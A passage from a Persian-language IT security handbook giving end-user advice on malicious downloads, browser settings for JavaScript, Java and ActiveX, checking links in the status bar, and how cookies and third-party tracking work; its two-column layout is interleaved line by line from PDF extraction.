‫ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻄﻮﺭ ﻣﺘﻨﺎﻭﺏ ﭘﻮﺷﺔ ﻫﺮﺯﻧﺎﻣﻪ ﺭﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻴـﺪ ﺗـﺎ‬
‫ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﻛﻪ ﺑﺮﺍﻱ ﺍﺟﺮﺍ ﺩﺭ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺩﺭﻧﻈـﺮ ﮔﺮﻓﺘـﻪ ﺷـﺪﻩ‬
‫ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﻣﺤﺘﻮﻳﺎﺕ ﺁﻥ ﻗﺮﺑﺎﻧﻴﻬﺎﻱ ‪False Positive‬‬
‫ﺑﺎﺷﻨﺪ‪.‬‬
‫ﻧﻴﺴﺘﻨﺪ‪.‬‬

‫‪77‬‬ ‫‪Static‬‬
‫‪78‬‬ ‫‪Dynamic‬‬ ‫‪76‬‬ ‫‪Challenge-Response‬‬
‫‪٨٥‬‬ ‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬

‫ﺍﺟــﺮﺍﻱ ﺑﺮﻧﺎﻣــﺔ ﻣــﻮﺭﺩ ﻧﻴــﺎﺯ ﺟﻬــﺖ ﻣــﺸﺎﻫﺪﺓ ﺻــﺤﻴﺢ‬ ‫ﻗﺎﻧﻮﻥ ﻳﺎﺯﺩﻫﻢ‬


‫ﻣﺤﺘﻮﻳﺎﺕ ﺁﻥ ﭘﺎﻳﮕﺎﻩ ﺍﺯ ﺷﻤﺎ ﺳﺆﺍﻝ ﻧﻤﺎﻳﺪ‪.‬‬ ‫ﺑﻪ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﺍﺟﺎﺯﻩ ﻧﺪﻫﻴـﺪ ﻛـﻪ ﺑﺮﻧﺎﻣـﻪ ﻫـﺎﻱ‬
‫ﻣﺨﺮﺏ ﺭﺍ ﺩﺭ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ‪ download‬ﻭ ﺍﺟﺮﺍ ﻧﻤﺎﻳﻨﺪ‪،‬‬
‫ﻗﺎﻧﻮﻥ ﺩﻭﺍﺯﺩﻫﻢ‪:‬‬
‫ﻼ ﺍﻃﻤﻴﻨـﺎﻥ ﺩﺍﺷـﺘﻪ‬‫ﻣﮕﺮ ﺍﻳﻨﻜﻪ ﺑﻪ ﺁﻥ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻛﺎﻣ ﹰ‬
‫ﺑﻪ ﺁﺩﺭﺱ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻭ ﺁﺩﺭﺳـﻲ ﻛـﻪ ﺑـﻪ ﺁﻥ ﻣﺘـﺼﻞ‬
‫ﺑﺎﺷﻴﺪ‪.‬‬
‫ﻣﻲﺷﻮﻳﺪ ﺩﻗﺖ ﻛﻨﻴﺪ ﻭ ﻫﻨﮕﺎﻡ ﻣﺸﺎﻫﺪﺓ ﻳـﻚ ﭘﺎﻳﮕـﺎﻩ‬
‫ﻭﺏ ﻧﺎﺷﻨﺎﺧﺘﻪ‪ ،‬ﺑﻪ ﺁﻥ ﺗﻮﺟﻪ ﻧﻤﺎﻳﻴﺪ؛ ﺧﺼﻮﺻ ﹰﺎ ﺍﮔﺮ ﺑـﻪ‬ ‫‪ Download‬ﭘﻮﻳﺎﻱ ﺑﺮﻧﺎﻣﻪﻫﺎ ﮔﺎﻫﻲ ﺍﻭﻗـﺎﺕ ﻣـﻲﺗﻮﺍﻧـﺪ ﺑـﺴﻴﺎﺭ‬
‫ﺁﻥ ﭘﺎﻳﮕﺎﻩ ﺍﺟﺎﺯﺓ ﺍﺟﺮﺍﻱ ﻳﻚ ﺑﺮﻧﺎﻣﻪ ﺭﻭﻱ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ‬ ‫ﻣﻔﻴﺪ ﺑﺎﺷﺪ‪ .‬ﺍﻳﻦ ﻗﺎﺑﻠﻴﺖ ﺑﻪ ﺷﻤﺎ ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫـﺪ ﻛـﻪ ﺍﺯ ﺧـﺪﻣﺎﺕ‬
‫ﺑﺨﺶ ﺩﻭﻡ‬

‫ﻼ ﺑﻪ ﻭﻳﺮﻭﺱﻳﺎﺑﻲ ﻭ ﺭﻓـﻊ ﻣـﺸﻜﻼﺕ‬ ‫ﺑﺮﺧﻂ‪ ٧٩‬ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ؛ ﻣﺜ ﹰ‬


‫ﺭﺍ ﺩﺍﺩﻩﺍﻳﺪ‪.‬‬
‫ﺍﻣﻨﻴﺘﻲ ﺑﭙﺮﺩﺍﺯﻳﺪ‪ .‬ﻫﻤﭽﻨﻴﻦ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﻧﺮﻡ ﺍﻓﺰﺍﺭ ﺷـﻤﺎ ﺑﺘﻮﺍﻧـﺪ‬
‫ﻣﺮﻭﺭﮔﺮﻫﺎﻱ ﻭﺏ ﻣﻲﺗﻮﺍﻧﻨـﺪ ﻃـﻮﺭﻱ ﺗﻨﻈـﻴﻢ ﺷـﻮﻧﺪ ﻛـﻪ ﺁﺩﺭﺱ‬ ‫ﺑﺴﺎﺩﮔﻲ ﻧﺼﺐ ﻭ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺷـﻮﺩ؛ ﺑـﺪﻭﻥ ﺍﻳﻨﻜـﻪ ﻻﺯﻡ ﺑﺎﺷـﺪ‬
‫ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺩﺭﺣﺎﻝ ﻣﺸﺎﻫﺪﻩ ﺭﺍ ﻧﺸﺎﻥ ﺩﻫﻨـﺪ )ﺍﻳـﻦ ﻗﺎﺑﻠﻴـﺖ ﻣﻌﻤـﻮ ﹰ‬
‫ﻻ‬ ‫ﻛﺎﺭﺑﺮ ﺭﻭﺍﻟﻬﺎﻱ ﭼﻨﺪﻣﺮﺣﻠﻪﺍﻱ ﭘﻴﭽﻴﺪﻩ ﻭ ﻓﻨﻲ ﺍﻧﺠﺎﻡ ﺩﻫﺪ‪.‬‬
‫‪ Navigation Bar‬ﻳﺎ ‪ Address Bar‬ﻧﺎﻣﻴـﺪﻩ ﻣـﻲﺷـﻮﺩ(‪ .‬ﻫﻨﮕﺎﻣﻴﻜـﻪ‬
‫ﻣﺘﺄﺳﻔﺎﻧﻪ ‪ download‬ﭘﻮﻳـﺎ ﻭ ﺧﻮﺩﻛـﺎﺭ ﺑﺮﻧﺎﻣـﻪﻫـﺎ ﻣـﻲﺗﻮﺍﻧـﺪ‬
‫ﻣﻜﺎﻥﻧﻤﺎﻱ‪ ٨٠‬ﺷﻤﺎ ﺑﻪ ﻳﻚ ﺍﺭﺗﺒﺎﻁ‪ ٨١‬ﺍﺷﺎﺭﻩ ﻣﻲﻛﻨﺪ‪ ،‬ﺍﻳﻦ ﻭﻳﮋﮔـﻲ‬
‫ﺧﻄﺮﻧﺎﻙ ﻭ ﻣﺨﺮﺏ ﻧﻴﺰ ﺑﺎﺷﺪ‪ .‬ﻛﻠﻴﺔ ﻣﺮﻭﺭﮔﺮﻫـﺎ ﺑـﻪ ﺷـﻤﺎ ﺍﺟـﺎﺯﻩ‬
‫ﻣﻲﺗﻮﺍﻧﺪ ﻧﺸﺎﻥ ﺩﻫﺪ ﻛﻪ ﺁﻥ ﺍﺭﺗﺒﺎﻁ ﺑﻪ ﭼـﻪ ﺁﺩﺭﺳـﻲ ﺍﺷـﺎﺭﻩ ﺩﺍﺭﺩ‬
‫ﻣﻲﺩﻫﻨﺪ ﻛﻪ ﺑﺮﻧﺎﻣﻪﻫـﺎﻱ ‪ ActiveX ،Java ،JavaScript‬ﻭ‬
‫)ﻧﻮﺍﺭ ﻭﺿﻌﻴﺖ‪ .(٨٢‬ﺑﺎ ﻣﺸﺎﻫﺪﺓ ﺁﻥ ﺁﺩﺭﺱ ﻣﺘﻮﺟﻪ ﻣﻲﺷـﻮﻳﺪ ﻛـﻪ ﺑـﻪ‬
‫ﺩﻳﮕﺮ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺴﻲ ﺭﺍ ﺭﻭﻱ ﺭﺍﻳﺎﻧﺔ ﺧـﻮﺩ ‪download‬‬
‫ﭼﻪ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺩﻳﮕﺮﻱ ﻓﺮﺳـﺘﺎﺩﻩ ﺧﻮﺍﻫﻴـﺪ ﺷـﺪ؛ ﭘﺎﻳﮕـﺎﻫﻲ ﻛـﻪ‬
‫ﻼ ﺍﻳﻤﻦ ﺑﺎﺷﻴﺪ ﻧﺒﺎﻳـﺪ ﺍﺟـﺎﺯﺓ‬
‫ﻭ ﺍﺟﺮﺍ ﻛﻨﻴﺪ‪ ،‬ﺍﻣﺎ ﺍﮔﺮ ﻣﻲﺧﻮﺍﻫﻴﺪ ﻛﺎﻣ ﹰ‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﻏﻴﺮﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ ﺑﺎﺷﺪ؛ ﻳـﺎ ﺷـﺎﻳﺪ ﻧﺨﻮﺍﻫﻴـﺪ ﺁﻧـﺮﺍ‬
‫ﺍﺟﺮﺍﻱ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺭﺍ ﺻﺎﺩﺭ ﻧﻤﺎﻳﻴﺪ‪ .‬ﺍﻟﺒﺘﻪ ﺑﺎ ﻏﻴﺮﻓﻌـﺎﻝ ﻧﻤـﻮﺩﻥ‬
‫ﻣﺸﺎﻫﺪﻩ ﻛﻨﻴﺪ‪ .‬ﺩﺭ ﻋﻤﻞ ﻣﻤﻜﻦ ﺍﺳﺖ ﻧﺨﻮﺍﻫﻴـﺪ ﺑـﺎ ﻫـﺮ ﻛﻠﻴـﻚ‬
‫ﺍﻳﻦ ﻭﻳﮋﮔﻴﻬﺎ ﻣﺘﻮﺟﻪ ﺧﻮﺍﻫﻴﺪ ﺷﺪ ﻛﻪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ‬
‫‪ Navigation Bar‬ﻭ ‪ Status Bar‬ﺭﺍ ﺑﺮﺭﺳـﻲ ﻛﻨﻴـﺪ‪ ،‬ﺍﻣـﺎ‬
‫ﻧﻤﻲﺗﻮﺍﻧﻨﺪ ﻣﺜﻞ ﮔﺬﺷﺘﻪ ﻛﺎﺭ ﻛﻨﻨﺪ‪.‬‬
‫ﻭﻗﺘﻴﻜﻪ ﺩﺭ ﻳﻚ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ ﻧﺎﺁﺷـﻨﺎ ﻫـﺴﺘﻴﺪ ‪ -‬ﺑﺨـﺼﻮﺹ ﺍﮔـﺮ‬
‫‪ Java‬ﻳﺎ ‪ ActiveX‬ﺭﺍ ﻓﻌﺎﻝ ﻛﺮﺩﻩ ﺑﺎﺷﻴﺪ ‪ -‬ﺑﺎﻳﺪ ﺍﺯ ﺍﻳـﻦ ﺍﺑـﺰﺍﺭ‬ ‫ﺑﺠﺎﻱ ﻣﺴﺪﻭﺩ ﻛﺮﺩﻥ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺍﻳـﻦ ﻫﻤـﻪ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ ﺑﺎﻳـﺪ‬
‫ﺑﮕﻮﻧﻪﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ ﻛـﻪ ﭼﻨﺎﻧﭽـﻪ ﺑـﺼﻮﺭﺕ ﻧﺎﺧﻮﺍﺳـﺘﻪ ﺑـﻪ‬ ‫ﺑﺪﻧﺒﺎﻝ ﻳﻚ ﺭﺍﻩ ﺣﻞ ﻣﻨﻄﻘﻲ ﺑﻮﺩ‪:‬‬
‫ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺟﺪﻳﺪﻱ ﻫﺪﺍﻳﺖ ﺷﺪﻳﺪ ﺍﺯ ﺁﻥ ﺁﮔﺎﻫﻲ ﻳﺎﺑﻴﺪ‪.‬‬ ‫ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﻧﺴﺒﺘﹰﺎ ﺍﻳﻤـﻦ ﻭ ﺭﺍﻳـﺞ ﻣﺎﻧﻨـﺪ ‪ Javascript‬ﺭﺍ‬ ‫•‬
‫ﻓﻌﺎﻝ ﻧﻤﺎﻳﻴﺪ‪ .‬ﺑﺎ ﺍﻳﻨﻜﺎﺭ ﺑﻪ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﺯﻳـﺎﺩﻱ ﺍﺟـﺎﺯﻩ‬
‫‪Cookie‬ﻫﺎ‬
‫ﻣﻲﺩﻫﻴﺪ ﻛﻪ ﺑﺘﻮﺍﻧﻨﺪ ﺑﻄﻮﺭ ﺻﺤﻴﺢ ﻋﻤﻞ ﻛﻨﻨﺪ‪.‬‬
‫‪ Cookie‬ﺍﻃﻼﻋﺎﺗﻲ ﺍﺳﺖ ﻛﻪ ﻣﺮﻭﺭﮔـﺮ ﻫﻨﮕـﺎﻡ ﻣـﺸﺎﻫﺪﺓ ﻳـﻚ‬
‫ﻗﺎﺑﻠﻴﺘﻬﺎﻳﻲ ﻣﺎﻧﻨﺪ ‪ Java‬ﻭ ‪ ActiveX‬ﻛﻪ ﺍﻳﻤﻨﻲ ﻛﻤﺘﺮﻱ‬ ‫•‬
‫ﺏ ﺭﺍﻩ ﺩﻭﺭ ﺭﻭﻱ ﺩﻳــﺴﻚ ﺳــﺨﺖ ﺭﺍﻳﺎﻧــﻪ ﻣــﻲﻧﻮﻳــﺴﺪ‪.‬‬ ‫ﭘﺎﻳﮕــﺎﻩ ﻭ ﹺ‬
‫ﺩﺍﺭﻧﺪ ﻭ ﻛﻤﺘﺮ ﻧﻴﺰ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﻧﺪ ﺭﺍ ﻏﻴﺮﻓﻌﺎﻝ ﻛﻨﻴـﺪ ﻳـﺎ‬
‫ﻫﻨﮕﺎﻣﻴﻜﻪ ﺑﻌﺪﻫﺎ ﺩﻭﺑﺎﺭﻩ ﻫﻤـﺎﻥ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ ﺭﺍ ﻣـﺸﺎﻫﺪﻩ ﻛﻨﻴـﺪ‪،‬‬
‫ﻣﺮﻭﺭﮔــﺮ ﺧــﻮﺩ ﺭﺍ ﻃــﻮﺭﻱ ﺗﻨﻈــﻴﻢ ﻧﻤﺎﻳﻴــﺪ ﻛــﻪ ﻗﺒــﻞ ﺍﺯ‬
‫‪cookie‬ﻫﺎﻱ ﻣﺮﺑﻮﻁ ﺑﻪ ﺷﻤﺎ ﻣﺠﺪﺩﹰﺍ ﺑـﺮﺍﻱ ﺁﻥ ﭘﺎﻳﮕـﺎﻩ ﺍﺭﺳـﺎﻝ‬
‫ﺑﻜﺎﺭﮔﻴﺮﻱ ﺁﻧﻬﺎ ﺍﺯ ﺷﻤﺎ ﺍﺟﺎﺯﻩ ﺑﮕﻴـﺮﺩ‪ .‬ﻏﻴﺮﻓﻌـﺎﻝ ﻧﻤـﻮﺩﻥ‬
‫ﻣﻲﺷﻮﻧﺪ‪ .‬ﺩﺭﻭﺍﻗﻊ ﻫﺮ ‪ cookie‬ﻣﺮﺑﻮﻁ ﺑﻪ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻣﺒﺪﺃ ﺧـﻮﺩ‬
‫ﺍﻳﻦ ﻗﺎﺑﻠﻴﺘﻬﺎ ﺑﺪﻳﻦ ﻣﻌﻨﺎﺳـﺖ ﻛـﻪ ﺍﺯ ﺁﻥ ﭘـﺲ ﺑﻌـﻀﻲ ﺍﺯ‬
‫ﺍﺳﺖ؛ ﺍﮔﺮﭼﻪ ﺑﺮﺧﻲ ﺍﺯ ﺍﺷﻜﺎﻻﺕ ﻣﻮﺟـﻮﺩ ﺩﺭ ﻣﺮﻭﺭﮔﺮﻫـﺎ ﺑﺎﻋـﺚ‬
‫ﺗﻮﺍﺑﻊ ﻣﺮﻭﺭﮔﺮ ﻛﺎﺭ ﻧﺨﻮﺍﻫﻨﺪ ﻛﺮﺩ‪ .‬ﺑﺎ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺑﻌـﻀﻲ‬
‫ﻣــﻲﺷــﻮﻧﺪ ﻛــﻪ ﭘﺎﻳﮕﺎﻫﻬــﺎ ﺑﺘﻮﺍﻧﻨــﺪ ‪cookie‬ﻫــﺎﻱ ﻳﻜــﺪﻳﮕﺮ ﺭﺍ‬
‫ﺍﺯ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﺷﻤﺎ ﻫﺸﺪﺍﺭ ﺩﻫﻨـﺪ ﻭ‬
‫ﻣﺸﺎﻫﺪﻩ ﻧﻤﺎﻳﻨﺪ‪ Cookie .‬ﺑﻪ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻣﺘﺬﻛﺮ ﻣـﻲﺷـﻮﺩ ﻛـﻪ‬
‫ﺑﺮﺧﻲ ﺩﻳﮕﺮ ﺍﺯ ﺍﺩﺍﻣﺔ ﻓﻌﺎﻟﻴﺖ ﺑﺎﺯ ﺑﻤﺎﻧﻨﺪ‪ .‬ﺍﮔﺮ ﻣﺎﻳﻞ ﻧﻴﺴﺘﻴﺪ‬
‫ﻼ ﺩﺭ‬‫ﺷﻤﺎ ﭼﻪ ﻛﺴﻲ ﻫﺴﺘﻴﺪ‪ ،‬ﻣﻴﻞ ﻭ ﺳﻠﻴﻘﺔ ﺷـﻤﺎ ﭼﻴـﺴﺖ‪ ،‬ﻭ ﻗـﺒ ﹰ‬
‫ﭼﻨﻴﻦ ﺍﺗﻔﺎﻗﻲ ﺭﺥ ﺩﻫـﺪ‪ ،‬ﻣﺮﻭﺭﮔـﺮ ﺑﺎﻳـﺪ ﺑﺘﻮﺍﻧـﺪ ﻧﻴﺎﺯﻫـﺎﻱ‬
‫ﺁﻥ ﭘﺎﻳﮕﺎﻩ ﭼﻪ ﻓﻌﺎﻟﻴﺘﻬﺎﻳﻲ ﺍﻧﺠﺎﻡ ﺩﺍﺩﻩﺍﻳﺪ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﻫﻨﮕﺎﻣﻴﻜﻪ‬
‫ﭘﺎﻳﮕـﺎﻩ ﻭﺏ ﺭﺍ ﺷﻨﺎﺳـﺎﻳﻲ ﻛﻨـﺪ ﻭ ﺑـﺮﺍﻱ ‪ download‬ﻭ‬

‫‪80‬‬ ‫‪Cursor‬‬
‫‪81‬‬ ‫‪Link‬‬
‫‪82‬‬ ‫‪Status Bar‬‬ ‫‪79‬‬ ‫‪Online Services‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٨٦‬‬

‫ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﺧﺎﺭﺟﻲ ﺫﺧﻴﺮﻩ ﻣﻲﮔﺮﺩﻧـﺪ ﺗﻔـﺎﻭﺕ ﻗﺎﺋـﻞ ﺷـﻮﺩ‪.‬‬ ‫ﺑﺎ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ ﻋﺒﻮﺭ ﺧﻮﺩ ﻭﺍﺭﺩ ﻳﻚ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻣﻲﺷـﻮﻳﺪ‪،‬‬
‫ﺍﺳﺎﺳﹰﺎ ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺟﺎﺯﺓ ﺫﺧﻴﺮﺓ ﻫﻤﺔ ‪cookie‬ﻫﺎ ﺭﺍ ﺑﺪﻫﻴﺪ‪ ،‬ﺍﺯ‬ ‫ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺍﻳﻦ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺩﺭ ﻳـﻚ ‪ cookie‬ﺑـﺮ ﺭﻭﻱ ﺭﺍﻳﺎﻧـﺔ‬
‫ﺫﺧﻴﺮﺓ ﺁﻧﻬﺎ ﺟﻠﻮﮔﻴﺮﻱ ﻛﻨﻴﺪ‪ ،‬ﻭ ﻳﺎ ﺍﺯ ﻣﺮﻭﺭﮔﺮ ﺑﺨﻮﺍﻫﻴﺪ ﻛﻪ ﻗﺒﻞ ﺍﺯ‬ ‫ﻼ ﭘﺲ ﺍﺯ ﻳﻚ ﻫﻔﺘﻪ ﺩﻭﺑﺎﺭﻩ ﺑـﻪ‬ ‫ﺷﻤﺎ ﺫﺧﻴﺮﻩ ﻣﻲﻛﻨﺪ‪ .‬ﻭﻗﺘﻲﻛﻪ ﻣﺜ ﹰ‬
‫ﺫﺧﻴﺮﺓ ﺁﻧﻬﺎ ﺍﺯ ﺷﻤﺎ ﺳﺆﺍﻝ ﻧﻤﺎﻳﺪ‪ .‬ﺷﻤﺎ ﻫﺮﮔﺰ ﻣﻄﻠﻊ ﻧﻤﻲﺷﻮﻳﺪ ﻛﻪ‬ ‫ﺁﻥ ﻣﺮﺍﺟﻌﻪ ﻣﻲﻛﻨﻴﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮ ﺍﺳﺎﺱ ﺍﻃﻼﻋﺎﺕ ﻣﻮﺟﻮﺩ ﺩﺭ‬
‫ﭼﻪ ﺯﻣﺎﻧﻲ ﺍﻃﻼﻋﺎﺕ ﺫﺧﻴﺮﻩ ﺷﺪﻩ ﺩﺭ ﻳـﻚ ‪ cookie‬ﺑـﻪ ﭘﺎﻳﮕـﺎﻩ‬ ‫‪ cookie‬ﻣــﺬﻛﻮﺭ ﺑــﺼﻮﺭﺕ ﺧﻮﺩﻛــﺎﺭ ﻭﺍﺭﺩ ﺁﻥ ﭘﺎﻳﮕــﺎﻩ ﺷــﻮﻳﺪ‪.‬‬
‫ﻭﺏ ﻣﺒﺪﺃ ﺑﺎﺯﻣﻲﮔﺮﺩﺩ‪.‬‬ ‫‪Cookie‬ﻫﺎ ﻫﻤﭽﻨﻴﻦ ﺑﻪ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫﻨﺪ ﺁﻧﭽـﻪ‬
‫ﺭﺍ ﻛﻪ ﺩﺭ ﻳﻚ ﺟﻠﺴﻪ‪ ٨٣‬ﺍﻧﺠﺎﻡ ﺩﺍﺩﻩﺍﻳﺪ ﺭﺩﻳﺎﺑﻲ ﻧﻤﺎﻳﻨﺪ‪.‬‬
‫‪Cookie‬ﻫﺎ ﺭﺍ ﻣﻲﺗـﻮﺍﻥ ﺑﺮﺭﺳـﻲ ﻧﻤـﻮﺩ ﺯﻳـﺮﺍ ﺩﺭ ﻗﺎﻟـﺐ ﻣﺘﻨـﻲ‬
‫ﻫﺴﺘﻨﺪ‪ ،‬ﺍﻣﺎ ﭼﻮﻥ ﺍﻃﻼﻋـﺎﺕ ﻣﻮﺟـﻮﺩ ﺩﺭ ﺁﻥ ﺗﻮﺳـﻂ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ‬ ‫ﺍﮔﺮﭼﻪ ﻳﻚ ‪ cookie‬ﺑﻪ ﺷﻜﻞ ﻣﻌﻤﻮﻝ ﺗﻨﻬﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﭘﺎﻳﮕـﺎﻩ‬
‫ﻻ ﻗﺎﺑﻞ ﻓﻬﻢ ﻧﻤﻲﺑﺎﺷﻨﺪ‪ .‬ﺑﺮﺧﻲ ﺍﺯ‬ ‫ﻣﺒﺪﺃ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﺷﻮﺩ ﻣﻌﻤﻮ ﹰ‬ ‫ﻭﺏ ﻣﺒﺪﺃ ﺧﻮﺩ ﺑﺎﺯﻳﺎﺑﻲ ﺷﻮﺩ‪ ،‬ﺍﻣﺎ ﻣﻤﻜﻦ ﺍﺳـﺖ ﭘﺎﻳﮕـﺎﻩ ﻭﺑـﻲ ﻛـﻪ‬
‫ﻣﺮﻭﺭﮔﺮﻫﺎ ﺍﺟﺎﺯﺓ ﻧﻤﺎﻳﺶ ﻭ ﺣـﺬﻑ ‪cookie‬ﻫـﺎ ﺭﺍ ﻣـﻲﺩﻫﻨـﺪ ﻭ‬ ‫ﻣﺸﺎﻫﺪﻩ ﻣﻲﻛﻨﻴﺪ ﺣﺎﻭﻱ ﺗـﺼﺎﻭﻳﺮ ﻭ ﺍﺷـﻴﺎﺀ ﺩﻳﮕـﺮﻱ ﺑﺎﺷـﺪ ﻛـﻪ‬
‫‪٨٤‬‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺛﺎﻟﺜﻲ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛـﻪ ﺍﺟـﺎﺯﺓ ﻣـﺪﻳﺮﻳﺖ ﺁﻧﻬـﺎ ﺭﺍ ﻧﻴـﺰ‬ ‫ﻣﺮﺑﻮﻁ ﺑﻪ ﻳﻚ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺛﺎﻧﻮﻳﻪ ﻫﺴﺘﻨﺪ )ﻛﻪ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺧـﺎﺭﺟﻲ‬
‫ﺑﺮﺍﻱ ﺷﻤﺎ ﻓﺮﺍﻫﻢ ﻣﻲﺁﻭﺭﻧﺪ‪.‬‬ ‫ﻳﺎ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺷﺨﺺ ﺛﺎﻟﺚ‪ ٨٥‬ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷـﻮﺩ( ﻭ ﺁﻥ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺛﺎﻧﻮﻳـﻪ‬
‫ﻧﻴﺰ ﺑﺘﻮﺍﻧﺪ ‪cookie‬ﻫﺎ ﺭﺍ ﺫﺧﻴﺮﻩ ﻭ ﺑﺎﺯﻳـﺎﺑﻲ ﻧﻤﺎﻳـﺪ‪ .‬ﺍﺯ ﺁﻧﺠـﺎ ﻛـﻪ‬
‫ﺍﮔﺮ ﻣﻲﺧﻮﺍﻫﻴﺪ ﺍﻃﻼﻋﺎﺗﻲ ﻛﻪ ﻳـﻚ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ ﺩﺭ ﻣـﻮﺭﺩ ﺷـﻤﺎ‬
‫ﻼ ﻣﺘﻮﺟـﻪ‬ ‫ﺗﺼﺎﻭﻳﺮ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻧﺎﻣﺮﺋﻲ ﺑﺎﺷـﻨﺪ‪ ،‬ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺍﺻـ ﹰ‬
‫ﻣﻲ ﺩﺍﻧﺪ ﺭﺍ ﻛﻨﺘﺮﻝ ﻛﻨﻴﺪ ﺑﺎﻳـﺪ ﺯﻣـﺎﻥ ﻭ ﭼﮕـﻮﻧﮕﻲ ﺫﺧﻴـﺮﻩﺷـﺪﻥ‬
‫ﻧﺸﻮﻳﺪ ﻛﻪ ﭼﻨﻴﻦ ﺍﺗﻔﺎﻗﻲ ﺭﺥ ﺩﺍﺩﻩ ﺍﺳﺖ‪ .‬ﺍﻳـﻦ ﺗـﺼﺎﻭﻳ ﹺﺮ ﻏﻴﺮﻗﺎﺑـﻞ‬
‫‪cookie‬ﻫﺎ ﺭﻭﻱ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﺭﺍ ﻛﻨﺘـﺮﻝ ﻧﻤﺎﻳﻴـﺪ‪ .‬ﺗﻮﺟـﻪ ﺩﺍﺷـﺘﻪ‬
‫ﺭﺅﻳﺖ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺎ ﺭﺩﻳﺎﺑﻲ ﭘﺎﻳﮕﺎﻫﻬـﺎﻱ ﻭﺑـﻲ ﻛـﻪ ﺷـﻤﺎ ﺁﻧﻬـﺎ ﺭﺍ‬
‫ﺑﺎﺷﻴﺪ ﻛﻪ ﺑﺮﺧﻲ ﺍﺯ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﺑﺮﺍﻱ ﺍﻳﻨﻜﻪ ﺑﺘﻮﺍﻧﻨﺪ ﺑﺪﺭﺳﺘﻲ‬ ‫‪٨٦‬‬
‫ﻣﺸﺎﻫﺪﻩ ﻣﻲﻛﻨﻴﺪ ﺑﺮﺍﻱ ﺍﻫﺪﺍﻑ ﺗﺒﻠﻴﻐﺎﺗﻲ ﺑﻜﺎﺭ ﺭﻭﻧﺪ‪.‬‬
‫ﻋﻤﻞ ﻧﻤﺎﻳﻨﺪ ﻧﻴﺎﺯﻣﻨـﺪ ﺫﺧﻴـﺮﺓ ‪cookie‬ﻫـﺎ ﺭﻭﻱ ﺭﺍﻳﺎﻧـﺔ ﻛـﺎﺭﺑﺮ‬
